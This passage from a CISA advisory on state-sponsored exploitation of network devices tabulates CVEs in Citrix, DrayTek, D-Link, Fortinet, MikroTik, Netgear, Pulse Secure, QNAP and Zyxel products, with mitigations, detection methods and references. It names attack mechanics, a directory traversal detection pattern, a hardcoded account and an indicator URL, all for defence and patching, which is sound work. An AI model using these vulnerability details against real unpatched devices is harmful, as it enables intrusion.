vulnerability details outlined by vendor: Citrix: Mitigation Steps for CVE-2019-19781. \n * If possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list). 
_**Detection Methods**_

* CISA has developed a free detection tool for this vulnerability: cisa.gov/check-cve-2019-19781: Test a host for susceptibility to CVE-2019-19781.
* Nmap developed a script that can be used with the port scanning engine: CVE-2019-19781 – Critix ADC Path Traversal #1893.
* Citrix also developed a free tool for detecting compromises of Citrix ADC Appliances related to CVE-2019-19781: Citrix / CVE-2019-19781: IOC Scanner for CVE-2019-19781.
* CVE-2019-19781 is commonly exploited to install web shell malware. The National Security Agency (NSA) provides guidance on detecting and preventing web shell malware at <https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF> and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells>.

_**Vulnerable Technologies and Versions**_

The vulnerability affects the following Citrix product versions on all supported platforms:

* Citrix ADC and Citrix Gateway version 13.0 all supported builds before 13.0.47.24
* NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18
* NetScaler ADC and NetScaler Gateway version 12.0 all supported builds before 12.0.63.13
* NetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 11.1.63.15
* NetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12
* Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b

_**References**_

<https://support.citrix.com/article/CTX267027>

_**Table 6: Information on DrayTek CVE-2020-8515**_

DrayTek CVE-2020-8515 CVSS 3.0: 9.8 (Critical)
---

_**Vulnerability Description**_

DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.

_**Recommended Mitigations**_

* Users of affected models should upgrade to 1.5.1 firmware or later as soon as possible; the updated firmware addresses this issue.
* Disable remote access on your router if you don't need it.
* Disable remote access (admin) and SSL VPN. The ACL does not apply to SSL VPN connections (port 443), so you should also temporarily disable SSL VPN until you have updated the firmware.
* Always back up your config before doing an upgrade.
* After upgrading, check that the web interface now shows the new firmware version.
* Enable syslog logging to monitor for abnormal events.

_**Detection Methods**_

* Check that no additional remote access profiles (VPN dial-in, teleworker or LAN to LAN) or admin users (for router admin) have been added.
* Check if any ACLs (access control lists) have been altered.

_**Vulnerable Technologies and Versions**_

* This vulnerability affects the Vigor3900/2960/300B before firmware version 1.5.1.

_**References**_

<https://draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/>
<http://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html>
<https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html>

_**Table 7: Information on D-Link CVE-2019-16920**_

D-Link CVE-2019-16920 CVSS 3.0: 9.8 (Critical)
---

_**Vulnerability Description**_

Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565.
The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to command injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.

_**Recommended Mitigations**_

* Replace affected devices with ones that are currently supported by the vendor. End-of-life devices should not be used.

_**Detection Methods**_

* HTTP packet inspection to look for arbitrary input to the "ping_test" command

_**Vulnerable Technologies and Versions**_

* DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-82

_**References**_

<https://www.kb.cert.org/vuls/id/766427>
<https://fortiguard.com/zeroday/FG-VD-19-117>
<https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3>
<https://www.seebug.org/vuldb/ssvid-98079>

_**Table 8: Information on Fortinet CVE-2018-13382**_

Fortinet CVE-2018-13382 CVSS 3.0: 7.5 (High)
---

_**Vulnerability Description**_

An Improper Authorization vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to modify the password of an SSL VPN web portal user via specially crafted HTTP requests.
_**Recommended Mitigations**_

* Upgrade to FortiOS versions 5.4.11, 5.6.9, 6.0.5, 6.2.0 or above and/or upgrade to FortiProxy version 1.2.9 or above or version 2.0.1 or above.
* SSL VPN users with local authentication can mitigate the impact by enabling Two-Factor Authentication (2FA).
* Migrate SSL VPN user authentication from local to remote (LDAP or RADIUS).
* Totally disable the SSL-VPN service (both web-mode and tunnel-mode) by applying the following CLI commands: `config vpn ssl settings`, `unset source-interface`, `end`.

_**Detection Methods**_

* HTTP packet inspection to look for specially crafted packets containing the magic key for the SSL VPN password modification

_**Vulnerable Technologies and Versions**_

This vulnerability affects the following products:

* Fortinet FortiOS 6.0.0 to 6.0.4
* Fortinet FortiOS 5.6.0 to 5.6.8
* Fortinet FortiOS 5.4.1 to 5.4.10
* Fortinet FortiProxy 2.0.0
* Fortinet FortiProxy 1.2.8 and below
* Fortinet FortiProxy 1.1.6 and below
* Fortinet FortiProxy 1.0.7 and below

FortiOS products are vulnerable only if the SSL VPN service (web-mode or tunnel-mode) is enabled and users authenticate locally.

_**References**_

<https://fortiguard.com/psirt/FG-IR-18-389>
<https://fortiguard.com/advisory/FG-IR-18-389>
<https://www.fortiguard.com/psirt/FG-IR-20-231>

_**Table 9: Information on Mikrotik CVE-2018-14847**_

Mikrotik CVE-2018-14847 CVSS 3.0: 9.1 (Critical)
---

_**Vulnerability Description**_

MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.
_**Recommended Mitigations**_

* Upgrade WinBox and RouterOS and change passwords.
* Firewall the WinBox port from the public interface and from untrusted networks.

_**Detection Methods**_

* Use the `export` command to see all your configuration and inspect it for any abnormalities, such as unknown SOCKS proxy settings and scripts.

_**Vulnerable Technologies and Versions**_

This vulnerability affects the following MikroTik products:

* All bugfix releases from 6.30.1 to 6.40.7
* All current releases from 6.29 to 6.42
* All RC releases from 6.29rc1 to 6.43rc3

_**References**_

<https://blog.mikrotik.com/security/winbox-vulnerability.html>

_**Table 10: Information on Netgear CVE-2017-6862**_

Netgear CVE-2017-6862 CVSS 3.0: 9.8 (Critical)
---

_**Vulnerability Description**_

NETGEAR WNR2000v3 devices before 1.1.2.14, WNR2000v4 devices before 1.0.0.66, and WNR2000v5 devices before 1.0.0.42 allow authentication bypass and remote code execution via a buffer overflow that uses a parameter in the administration webapp. The NETGEAR ID is PSV-2016-0261.

_**Recommended Mitigations**_

* NETGEAR has released firmware updates that fix the unauthenticated remote code execution vulnerability for all affected products.

_**Detection Methods**_

* HTTP packet inspection to find any specially crafted packets attempting a buffer overflow through specialized parameters.
_**Vulnerable Technologies and Versions**_

This vulnerability affects the following products:

* WNR2000v3 before version 1.1.2.14
* WNR2000v4 before version 1.0.0.66
* WNR2000v5 before version 1.0.0.42
* R2000

_**References**_

<https://kb.netgear.com/000038542/Security-Advisory-for-Unauthenticated-Remote-Code-Execution-on-Some-Routers-PSV-2016-0261>
<https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_netgear_wnr2000v5_-_cve-2017-6862.pdf>
<http://www.securityfocus.com/bid/98740>

_**Table 11: Information on Pulse CVE-2019-11510**_

Pulse CVE-2019-11510 CVSS 3.0: 10 (Critical)
---

_**Vulnerability Description**_

In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to exploit an arbitrary file read vulnerability.

_**Recommended Mitigations**_

* Upgrade to the latest Pulse Secure VPN.
* Stay alert to any scheduled tasks or unknown files/executables.
* Create detection/protection mechanisms that respond to directory traversal (/../../../) attempts to read local system files.

_**Detection Methods**_

* CISA developed a tool to help determine if IOCs exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510: [cisa.gov/check-your-pulse](<https://github.com/cisagov/check-your-pulse>).
* Nmap developed a script that can be used with the port scanning engine: http-vuln-cve2019-11510.nse #1708.
_**Vulnerable Technologies and Versions**_

This vulnerability affects the following Pulse Connect Secure products:

* 9.0R1 to 9.0R3.3
* 8.3R1 to 8.3R7
* 8.2R1 to 8.2R12

_**References**_

<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>

_**Table 12: Information on Pulse CVE-2021-22893**_

Pulse CVE-2021-22893 CVSS 3.0: 10 (Critical)
---

_**Vulnerability Description**_

Pulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This vulnerability has been exploited in the wild.

_**Recommended Mitigations**_

* Update such systems to PCS 9.1R11.4.
* Run the PCS Integrity Assurance utility.
* Enable Unauthenticated Request logging.
* Enable remote logging.
* Pulse Secure has published a Workaround-2104.xml file that contains mitigations to protect against this and other vulnerabilities.
* Monitor capabilities in open source scanners.

_**Detection Methods**_

* Log correlation between the authentication servers responsible for LDAP and RADIUS authentication and the VPN server. Authentication failures in either LDAP or RADIUS logs with the associated VPN logins showing success would be an anomalous event worthy of flagging.
* The Pulse Security Check Tool.
* A 'recovery' file not present in legitimate versions: `https://ive-host/dana-na/auth/recover[.]cgi?token=<varies>`.

_**Vulnerable Technologies and Versions**_

This vulnerability affects Pulse Connect Secure 9.0R3/9.1R1 and higher.
_**References**_

<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>
<https://blog.pulsesecure.net/pulse-connect-secure-security-update/>
<https://kb.cert.org/vuls/id/213092>
<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>
<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>

_**Table 13: Information on QNAP CVE-2019-7192**_

QNAP CVE-2019-7192 CVSS 3.0: 9.8 (Critical)
---

_**Vulnerability Description**_

This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommends updating Photo Station to the latest versions.

_**Recommended Mitigations**_

Update Photo Station to versions:

* QTS 4.4.1 Photo Station 6.0.3 and later
* QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
* QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
* QTS 4.2.6 Photo Station 5.2.11 and later

_**Detection Methods**_

* N/A

_**Vulnerable Technologies and Versions**_

This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.

_**References**_

<https://www.qnap.com/zh-tw/security-advisory/nas-201911-25>
<http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html>

_**Table 14: Information on QNAP CVE-2019-7193**_

QNAP CVE-2019-7193 CVSS 3.0: 9.8 (Critical)
---

_**Vulnerability Description**_

This improper input validation vulnerability allows remote attackers to inject arbitrary code into the system. To fix the vulnerability, QNAP recommends updating QTS to the latest versions.
_**Recommended Mitigations**_

Update QTS to versions:

* QTS 4.4.1 build 20190918 and later
* QTS 4.3.6 build 20190919 and later

_**Detection Methods**_

* N/A

_**Vulnerable Technologies and Versions**_

This vulnerability affects QNAP QTS 4.3.6 and 4.4.1 or earlier.

_**References**_

<https://www.qnap.com/zh-tw/security-advisory/nas-201911-25>
<http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html>

_**Table 15: Information on QNAP CVE-2019-7194**_

QNAP CVE-2019-7194 CVSS 3.0: 9.8 (Critical)
---

_**Vulnerability Description**_

This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommends updating Photo Station to the latest versions.

_**Recommended Mitigations**_

Update Photo Station to versions:

* QTS 4.4.1 Photo Station 6.0.3 and later
* QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
* QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
* QTS 4.2.6 Photo Station 5.2.11 and later

_**Detection Methods**_

* N/A

_**Vulnerable Technologies and Versions**_

This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.

_**References**_

<https://www.qnap.com/zh-tw/security-advisory/nas-201911-25>
<http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html>

_**Table 16: Information on QNAP CVE-2019-7195**_

QNAP CVE-2019-7195 CVSS 3.0: 9.8 (Critical)
---

_**Vulnerability Description**_

This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommends updating Photo Station to the latest versions.
_**Recommended Mitigations**_

Update Photo Station to versions:

* QTS 4.4.1 Photo Station 6.0.3 and later
* QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
* QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
* QTS 4.2.6 Photo Station 5.2.11 and later

_**Detection Methods**_

* N/A

_**Vulnerable Technologies and Versions**_

This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.

_**References**_

<https://www.qnap.com/zh-tw/security-advisory/nas-201911-25>
<http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html>

_**Table 17: Information on Zyxel CVE-2020-29583**_

Zyxel CVE-2020-29583 CVSS 3.0: 9.8 (Critical)
---

_**Vulnerability Description**_

Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. The password for this account can be found in cleartext in the firmware. This account can be used by someone to log in to the SSH server or web interface with admin privileges.
_**Recommended Mitigations**_

* Download the latest patch (4.60 Patch1 or newer).

_**Detection Methods**_

* Login attempts to the hardcoded undocumented account, seen in either audit logs or intrusion detection systems.

_**Vulnerable Technologies and Versions**_

This vulnerability affects the following technologies and versions:

* ATP series running firmware ZLD V4.60
* USG series running firmware ZLD V4.60
* USG FLEX series running firmware ZLD V4.60
* VPN series running firmware ZLD V4.60
* NXC2500 running firmware V6.00 through V6.10
* NXC5500 running firmware V6.00 through V6.10

_**References**_

<http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf>
<https://businessforum.zyxel.com/discussion/5252/zld-v4-60-revoke-and-wk48-firmware-release>
<https://businessforum.zyxel.com/discussion/5254/whats-new-for-zld4-60-patch-1-available-on-dec-15>
<https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html>
<https://www.zyxel.com/support/CVE-2020-29583.shtml>
<https://www.zyxel.com/support/security_advisories.shtml>

### Revisions

Initial Version: June 7, 2022

Source: CISA Cybersecurity Advisory AA22-158A, "People's Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices," published June 10, 2022: <https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a>